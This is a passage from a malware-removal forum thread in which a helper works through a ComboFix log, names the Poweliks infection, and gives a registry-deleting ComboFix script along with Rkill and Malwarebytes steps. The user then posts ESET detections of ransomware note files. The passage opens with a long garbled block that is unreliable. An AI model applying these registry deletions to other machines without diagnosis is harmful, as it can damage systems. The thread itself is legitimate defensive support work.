J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXR\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JzO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rR\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\Sz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz07Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzO&I/02Sz%7];,3dXO rA27FXR\]ZO2JzO 
rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7J2m-9XR\1H,~iZO J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-dXO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kR\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\SH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH%7[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzO&I/02S"t56wb-nXO&I;%2JXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7];,3dXO rA27FXR\J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO JXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXR\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JzO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rR\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\SH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH0\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\dyt56ob7|H,fI/02S"t56sz\FzO&I/02S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7];,3dXO rA27FXR\]ZO2JzO rA3\nX%7Jfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO J&1\[zR\1H1A`Z,yJz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SH,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb%-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz07Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7S"t56sz\FzO&I/02S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02Sz%7]ZO2JzO r337|z%7];,3dXO rA27FXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7J&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO 
J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXR\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JzO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rR\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\Sz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz07Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzO&I/02Sz%7];,3dXO rA27FXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7J2m-9XR\1H,~iZO J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-dXO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kR\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\SH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH%7[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzO&I/02S"t56wb-nXO&I;%2JXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7];,3dXO rA27FXR\J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO JXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXRDi35\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/1"Kft;#sNf5jOsN.t&].w.j:4I}i4Wjj[|5VVh]is7p`.U1!#ApUmWP!A!}i^W4"$UlpNj#VN-5jgx1V1GCs^Si2&!tT\wo[AUjNKtTNxpNIJp+4x}3N #Mj1}p9sp OWIT.a qYBmsws?st2#jDWtF&!CTwZ4ZOI5V9d VI"K`s9+isVIpA.P3"?jiwf}qHwlh,D]sNf}2wf}y.Mty"t} 9\jTwf0#5&AgP w\jZs/1T#Vl#3M MD&PTwsNfo_pVsa]stf:jwZp`YGCx96]M4liigA4Zqr"jY t+1&p09opVt2mi9;}(jH}iwVp s2mi1KHVFo"jg1IA9~P!^2[&gA}VwI}Zoq5xN4}+t7.Z1GpiqwpUt;}.x9Pi\w13oG}fN\]stBjj";`sV}Ox# ^IPTgWl`oh`jshPVs24`I2}T1~p ,4] 4IeTgWj #~I3s8PyY]:j"f1AY~}x9x] 4IPiw&}yoA`fpSPT.\.`I;jP]"phw.H2O2C""V? 
sUpisGi:9om2wIK`YIt!xttK tT4;`195js"8i1m+`Yo5iox}T2SPM^lCT^A+!Bk?9tx}`IJ"2D S8bH[!jA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA`2I" Nxp`s$pio~pis~}j4vis^xKu^SITVGJZ*/mjwxp`s~}jwA}jwA} ^3IssA9xw" NxI:Ap?iH~pis~}jwA}iwAp+3S.TVG}0*!mjwx+^9\t!^A}jwA}iwAp`oAUFtU NxK:Ap?iHVKV}a}9A}iwApio~pis~[:V!mjwW.w9\t!^L\s99}TwAp`oA5js~}isA5NAp?iH&KV}a}^jis^x?io~pis~}`s$5jwpH89\t!^D\s99}TXrIssA\!s~}is~p`s$pio&riwa}^vis^x?P)S.TVG}`s$5jwAp`s~}jAD\M89}TlrIssAmxwU Nxp`s$pio~pis~}j9piq^x?PLS.TVGi0*!mjwxp`s~}jwA}jwA} \!?ssAmFIU Nxp`s$pio~pis~}jwA}iwApio~pis~}`s$5jwMl^9\t!aX\s99}TwAp`oAUVAU Nxp`s$pioVNTs~t!wA}iwApfLS.TVG}`s$5jw1}^9\t!^A}jwA}Pj!IssA\!s~}is~?.AO?iH~pis~}jgEiq^x?io~pis~i2IFmjwxp`s~}jx&\M89}TwAp`oAUw: Nxp`s$pio~pis~}jwA}iwApio~pis~}`s/Usa5j0*b\V&6e39j#^(1qOk"F};}is~pjqz.%$j?3wy K~MCqaq?haNHTF~i.A `F"D.0Fgn3^Fi3jcPiwC1:$l"&t.P!FUmy9$pio~IT5SeLxD}#I6KpsI+VFlPVFj1 xAp^I:](45i.\ZjVXYj Hk5js~}i}}HV1dK%$NlT.~#L~/Pqg.1itqp".Me0Nf5jwAp0wb8Vx/e ZF8!"sK s}j!*H#stnm8s]psHjIi*:#3"I[#aC+uH~pis~#^t 1sasK Vm#!Ih V\r8!g5.sak(V9S #N2pqspH 4mHs}7e34A[#aC+uH~pis~i:9G(s0XNwI0#ywr .4Z[qa(j0[tj&tk}i};.ws pV2tlq9g#2wA}iws}!a0IPsKeZt/(sas Ab]F\n .168o\&p^t.ts}:isj8.Z6OjUHbpis~}jjrn#a(I%$m.#}8tVFd&X1oIm#y`hi8c[s0XmZoIj.9oi#};?0F?p#mIft.}jwA}#jY.hX"HUtye.9 :sa5lZsb\x4/P(a9[#aC+_HA5js~iPql?s9O49$4.T}.e.4h83wCI!1~pis~}`}U":l&?`s~j(g&}?OA^U99NbOl1K1;H3slK_V!pf]dr!NA6s^ j#I6IV2alq28}s,U"j85G9a6wHnkDWeTwAp`o5(M,H[TVMI`Fzj#odrisHn." 
j+g*5iAH5pt;j^bT}f\q_V"Hs~Z}3khPu9q}Z[n}2w+H ..IZ2*K%}.NqAGjy4njsx +U(XN N~}`s$5.T!?At$iZR\Jy92^uwXlqBA\!s~^jY p`s$pioop#.N}9A}P\INTH~pi9qCUYX"f9ZjZY~8s^v6D}H "Il`2j\31x}#VkHUYHVe7NTs5CCj1}VwAps]q13qlJ2N9U!"2?NAAj(~sP9q}P\I.A3!5.sdni.4IwwhjioaIPHM]f9l]rR!N9sGpf5ZPH,%`M1 p`9~}jgsn.ADjV\&I`oAUjqlJfNGKAt3?%$~r3tH}3^qCrR\ro$~I s;ts}253gAp`saJ&"vjjlq[%^yK`B35V1;Hj%W?As$pi}W?it&tFwA}iw9p%37NTtHi.I}(:IDNA} F!82[ `c}+1DmZo3"MItt310KVI/.Va0.3Y;H?R\JTw&pTX0I3s;ty1V5VxAp`2y6ZDZH?RcJTwApZBct2.w}is;I.}*IT(8S"tA}jwA]949j34"}p.+tHY%dF&!pN37[!&h}FAD\T42KA( 9FIH]3I55^w-m+Hg4Tt$J&1c}iwA|"BU}rY~tV5*53A\pZ62Hs~x]f"pH35yj`t;j:NAHUwKIyNhNr1ANTs~t2w;}%\&jT]2+36HjNI/}?O&pNAA (gsP(gq8Txf;0\9!s~HUN"j_IfjpsU4"9\].ws}iws5i(M+3s;}js/tsT!NA5M}&\qCM"!\ow\NGVc5.A&C#5.my3aH"]a}+W7i:\w}jrhhfhappnstvj.uf":129njj&*j&9aiu"wn2s35ka5[!y"+`s%?ub;kit }3w 0yh"]ahot2j.aegm^zn.iu[l^m6jl2c!1yh.$fut}j+mmkqf+1z07|finpk4ahox:rp$w1uawpo}"fx:rasntx9a}jw2}%"a.0^ 9&tdcpa"+uyx3oants~\Mjf]9"5r3]l?Psw}8s2"x9qjjNa[&9*CKAyH!0yH2[xtsoZ}VV5IZ9oli2Ap%3XH:1D\sx:|Ta`j NHn`I+25!?qo7[kR\ fwFPox:lV#*I!Vw}i,DljNFH"sWIus0JF"1}VwApiowpis~}`6/mjwxp`s~}3wA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAn:!bFKD4#^E[9tX8qN&ZI7^9!SrHt8jfs.N!.DJVxF8U"w4 i!? *Zto9-1sgVm }ae jyJ38t^UgW5qaN}Lw_tpIA}q6s}+oZ}i}7^3\F8hg!l 1!j!,a8 Is1kTW}y2TC jX8:j/\"&E}Va/&s}a^UI85q6}mh1Z} 1ZF?SWt+5op/4(pUVZtjY[o?X4.`V![ftXp?X4#i^ENG\Xo?6(#iV!NGHzqq9|jbK !^E[o~!msTa|j3aJ0V;9:OD}Uo0^ZS6HLAy\rSh+G}hdZI7^/3F|wYP+pHZ} !!ixjE[!^Y}jXx4UI^^s,A` jXNsVNt(tEPwX^+4t4wTv}3N^[3I^4V.U5p]^Ih,H]xjEef"w4+X54+V![V.znZ4x5UA8^ jX\y&Et!X/qAHt(M6oC *042N}mh1Npj3kFM93(3zWTBlN!.(pj!dq!x*NV.(p.Z/ Fj98U5yH^T/qF.x8Up.H^!dq#x4Up.\VZw(/44? 
XZjuIHpU32n?0E?q*y8 DVFZ"hJ/"hSG)/tZhSFPYO5ysT5+4F0PY^nM^!vb*#JIn{l I!UvwQrPb+6,^U\=lE~Z~qbp8mmOm4`+*`N8pm^Wd+cbpAk4pAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-08-12 to 2014-09-12  )))))))))))))))))))))))))))))))
.
.
2014-09-12 16:24 . 2014-09-12 16:30 -------- d-----w- c:\users\hesperia\AppData\Local\temp
2014-09-12 16:24 . 2014-09-12 16:24 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-09-12 00:24 . 2014-08-21 02:44 8581864 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{8F68E643-289D-4C7B-8452-7774FD9BEDE9}\mpengine.dll
2014-09-10 10:08 . 2014-09-05 01:42 444416 ----a-w- c:\windows\system32\aepdu.dll
2014-09-10 10:08 . 2014-09-05 01:38 303104 ----a-w- c:\windows\system32\aeinv.dll
2014-09-10 09:37 . 2014-08-21 02:44 8581864 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2014-09-09 19:01 . 2014-09-09 19:01 -------- d-----w- c:\windows\system32\SPReview
2014-09-09 07:24 . 2014-09-12 07:14 -------- d-----w- C:\FRST
2014-09-09 06:47 . 2014-09-09 06:47 -------- d-----w- c:\program files\TeamViewer
2014-09-09 06:44 . 2014-09-09 06:44 -------- d-----w- c:\program files\Adblock Plus for IE
2014-09-09 06:41 . 2014-09-12 05:10 -------- d-----w- c:\programdata\Malwarebytes' Anti-Malware (portable)
2014-09-09 06:41 . 2014-09-09 06:41 113880 ----a-w- c:\windows\system32\drivers\48230029.sys
2014-09-09 06:40 . 2014-09-09 06:40 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-09-09 06:40 . 2014-05-11 23:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-09-09 06:40 . 2014-09-09 06:40 -------- d-----w- c:\users\hesperia\AppData\Local\Programs
2014-09-09 06:40 . 2014-09-12 04:59 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-09-09 06:30 . 2014-09-09 06:35 -------- d-----w- C:\AdwCleaner
2014-09-09 06:28 . 2014-09-12 04:58 -------- d-----w- c:\windows\ERUNT
2014-08-30 01:02 . 2014-08-20 01:38 893248 ------w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{902D1444-72CF-46A3-BD86-54933BA122E6}\gapaengine.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-12 04:59 . 2011-04-29 02:03 113880 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2014-08-20 01:38 . 2012-06-13 01:39 893248 ------w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\NISBackup\gapaengine.dll
2014-07-17 10:05 . 2014-07-17 10:05 231800 ----a-w- c:\windows\system32\drivers\MpFilter.sys
2014-07-17 10:05 . 2011-04-27 07:25 95920 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-03-15 98304]
"cAudioFilterAgent"="c:\program files\Conexant\cAudioFilterAgent\cAudioFilterAgent.exe" [2010-03-22 496184]
"TPwrMain"="c:\program files\TOSHIBA\Power Saver\TPwrMain.EXE" [2009-11-06 480608]
"00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2010-03-03 742712]
"TWebCamera"="c:\program files\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe" [2010-02-24 2454840]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\ipoint.exe" [2010-07-21 1797008]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2010-11-29 421888]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2010-12-13 421160]
"CanonMyPrinter"="c:\program files\Canon\MyPrinter\BJMyPrt.exe" [2009-11-01 2508104]
"CanonSolutionMenu"="c:\program files\Canon\SolutionMenu\CNSLMAIN.exe" [2009-09-03 767312]
"IAStorIcon"="c:\program files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe" [2011-10-17 284440]
"ToshibaServiceStation"="c:\program files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" [2011-02-11 1295736]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2014-08-22 974432]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2013-05-08 41056]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-04-04 958576]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
R3 cfWiMAXService;ConfigFree WiMAX Service;c:\program files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe [2010-01-28 185712]
R3 ConfigFree Service;ConfigFree Service;c:\program files\TOSHIBA\ConfigFree\CFSvcs.exe [2009-03-11 46448]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys [2014-07-17 95920]
R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\NisSrv.exe [2014-08-22 288120]
R3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;c:\windows\system32\Drivers\RtsUStor.sys [2010-02-01 182304]
R3 TOSHIBA HDD SSD Alert Service;TOSHIBA HDD SSD Alert Service;c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [2010-02-06 111960]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2010-12-22 1343400]
R3 WDC_SAM;WD SCSI Pass Thru driver;c:\windows\system32\DRIVERS\wdcsam.sys [2008-05-06 11520]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe [2010-03-15 172032]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2011-10-17 13592]
S2 regi;regi;c:\windows\system32\drivers\regi.sys [2007-04-18 11032]
S2 TeamViewer6;TeamViewer 6;c:\program files\TeamViewer\Version6\TeamViewer_Service.exe [2013-02-19 2417504]
S2 TOSHIBA eco Utility Service;TOSHIBA eco Utility Service;c:\program files\TOSHIBA\TECO\TecoService.exe [2010-03-17 189808]
S2 UNS;Intel® Management & Security Application User Notification Service;c:\program files\Intel\Intel® Management Engine Components\UNS\UNS.exe [2010-03-03 2320920]
S3 CnxtHdmiAudService;Conexant UAA HDMI Function Driver for High Definition Audio Service;c:\windows\system32\drivers\CHDMI32.sys [2010-03-05 516152]
S3 FwLnk;FwLnk Driver;c:\windows\system32\DRIVERS\FwLnk.sys [2009-07-07 7680]
S3 Impcd;Impcd;c:\windows\system32\DRIVERS\Impcd.sys [2010-02-10 132352]
S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x86.sys [2010-02-23 66600]
S3 PGEffect;Pangu effect driver;c:\windows\system32\DRIVERS\pgeffect.sys [2009-06-23 24064]
S3 TMachInfo;TMachInfo;c:\program files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [2011-02-11 54136]
.
.
Contents of the 'Scheduled Tasks' folder
.
2014-09-12 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-04-27 05:08]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com.au/
TCP: DhcpNameServer = 192.168.1.1
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
AddRemove-TOSHIBA Software Modem - c:\windows\agrsmdel
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-108206)
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:00000009
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-09-13  00:31:42
ComboFix-quarantined-files.txt  2014-09-12 16:31
.
Pre-Run: 577,795,473,408 bytes free
Post-Run: 578,759,012,352 bytes free
.
- - End Of File - - 8BE47EE16E09FA791337008E749810AF
5B5E648D12FCADC244C1EC30318E1EB9
 
 
Looks like it got the things I was worried about.


#9 olgun52

  • Malware Response Team
  • 3,784 posts

Posted 12 September 2014 - 07:34 PM

Looks like it got the things I was worried about.

Yes. There is the Poweliks virus, a new and critical virus.

 

Step 1:

 

CF-script.

  • Close any open browsers.
  • Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
  • Click Start > Run and in the box that opens type notepad and press enter. Copy/paste the text in the codebox below into it:
Registry::
[-HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}]
[-HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32]
[-HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32]
[HKEY_USERS\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]

RegNull::
[HKEY_USERS\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]

Save this as CFScript.txt, in the same location as ComboFix.exe

CFScriptB-4.gif

Referring to the picture above, drag CFScript into ComboFix.exe

When finished, it shall produce a log for you at C:\ComboFix.txt which I will require in your next reply.

 

Step 2:

 

Please download Rkill by Grinler and save it to your desktop.

  • Link 1
    Link 2
  • Double-click on the Rkill desktop icon to run the tool.
  • If using Vista or Windows 7, right-click on it and Run As Administrator.
  • A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully.
  • If not, delete the file, then download and use the one provided in Link 2.
  • If it does not work, repeat the process and attempt to use one of the remaining links until the tool runs.
  • If the tool does not run from any of the links provided, please let me know.
  • If your antivirus program gives a prompt message, respond positively to allow RKILL to run.
  • If a malware-rogue gives a message regarding RKILL, proceed forward to running RKILL

If you still have a problem running RKILL, you can download iExplore.exe or eXplorer.exe, which are renamed copies of rkill.com, and try them instead.

When all done, rkill.txt log file will be on your desktop. Copy & Paste contents of Rkill.txt into a new reply.

More Information about Rkill can be found at this link: http://www.bleepingc...opic308364.html

 

 

Please, you must do the following scan immediately.

 

Scan with Malwarebytes Antimalware:

Please download Malwarebytes Anti-Malware to your desktop.

  • Double-click the downloaded setup file and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
  • Launch Malwarebytes Anti-Malware
  • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.

If the program is already installed:

  • Run Malwarebytes Antimalware
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart, once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply

 

-------------------------------------------------------------------------------

 

Please send the ESET log and a fresh FRST log ---> (FRST.txt and additional.txt)

 

 

Have a nice day.


Best regards
 
If you wish to show appreciation and support me personally fighting against malware, then you can consider a donation. Thank you.
Malware fix forum
If I don't reply within 24 hours please PM me!

 


 


#10 tantryl


Posted 12 September 2014 - 08:54 PM

The ESET detections had me a little worried until I saw the "threats".

 

Worth noting: when I went to download rkill I had the same symptom that was the first to appear when the problem arrived - IE refuses to download any file at all due to a security setting. Resetting security fixes it (temporarily) and after running these things again it hasn't reappeared. Rkill and MBAM found nothing.

 

C:\Users\All Users\Norton\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\All Users\Norton\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\All Users\Norton\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan
C:\Users\All Users\Skype\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan
C:\Users\All Users\Skype\Plugins\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\Plugins\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\Plugins\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan
C:\Users\All Users\Skype\Plugins\Plugins\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\Plugins\Plugins\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\Plugins\Plugins\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan
C:\Users\All Users\Skype\Plugins\Plugins\F57B48ADF2224F088EDD1A2B9BAD84E8\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\Plugins\Plugins\F57B48ADF2224F088EDD1A2B9BAD84E8\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\Plugins\Plugins\F57B48ADF2224F088EDD1A2B9BAD84E8\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan
